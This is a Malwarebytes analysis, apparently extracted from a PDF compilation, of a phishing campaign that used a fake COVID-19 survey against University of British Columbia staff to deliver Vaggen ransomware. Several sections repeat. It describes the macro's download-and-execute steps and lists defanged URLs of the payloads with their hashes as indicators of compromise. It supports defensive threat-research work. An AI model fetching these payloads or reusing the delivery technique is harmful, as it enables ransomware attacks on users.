not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1599 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1600 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1601 of 3467\n\nWe were able to identify four other variants of the remote templates and payloads. 
In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1602 of 3467\n\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1603 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). 
At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1604 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1605 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1606 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1607 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. 
The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1608 of 
3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1609 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1610 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1611 
of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1612 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. 
When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1613 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1614 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. 
The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1615 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1616 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1617 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1618 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1619 of 
3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1620 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. 
A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1621 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 1622 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. 
This post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed to the Silent Librarian APT group. 
On October 19, we identified a new phishing document targeting staff at the University of British Columbia (UBC) with a fake COVID-19 survey.\r\nHowever, this attack and its motives are different from the ones previously documented. The survey is a malicious Word document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing campaign and were kind enough to share more information with us about the incident. Ultimately, this attack was not successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net and DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto Box and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a newly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from file sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with us by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a mandatory survey with you that must be completed by Monday. It asks a few questions about how you believe our company responded to the pandemic regarding remote working and much more. 
Please fill it out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities include: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees who fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be difficult!\r\nAccording to UBC, fewer than a hundred people within a specific department received the link to access the shared document. A Box or Dropbox account was required in order to download the file since it was shared privately, instead of publicly. This may have been an effort to evade detection, or perhaps the attacker expected the target organization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm) weaponized with a malicious macro. 
That file was uploaded to a free code hosting website (notabug.org).\r\nWhen the macro is executed, it does the following:\r\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following URL and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following URL and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls the Shell function to execute killar.exe\r\nChecks the return value of the Shell function to determine whether it was successful (the return value would be the task ID of the executed application)\r\nIf successful, it sends an HTTP GET request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends an HTTP GET request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we found several artifacts using Swedish words, which could indicate that the threat actor is familiar with the language.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use this type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. 
In this case, the attacker is probably interested in how many people opened the document and perhaps where they are from.\r\nVaggen ransomware\r\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to them. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment equivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go which starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG, main_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir\r\nmain_ELDBJORT -\u003e main_encryptFile\r\nmain_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs, can be found here.\r\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with XXTEA (using the xxtea-go library). Encrypted chunks are first decoded from Base64. The XXTEA key is hardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function path/filepath.Walk.\r\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. 
It uses a hardcoded key and a 12-byte nonce generated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12-byte nonce\r\nthe encrypted content\r\nthe 16-byte GCM tag\r\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take my heart my money”. Because the key is hardcoded and the nonce is stored alongside the ciphertext, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that the malware author has not received any payment so far at this Bitcoin address.\r\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor one affiliated with any of the big ransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this attack can be recovered from fairly easily.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of adding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a very similar macro to drop a coin miner. This raises more questions about the motivation behind this phishing attack.\r\nWe are grateful for the information shared with us by the University of British Columbia. 
This allowed us to paint a better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nIOCs\r\nVariant 1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant 2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\n
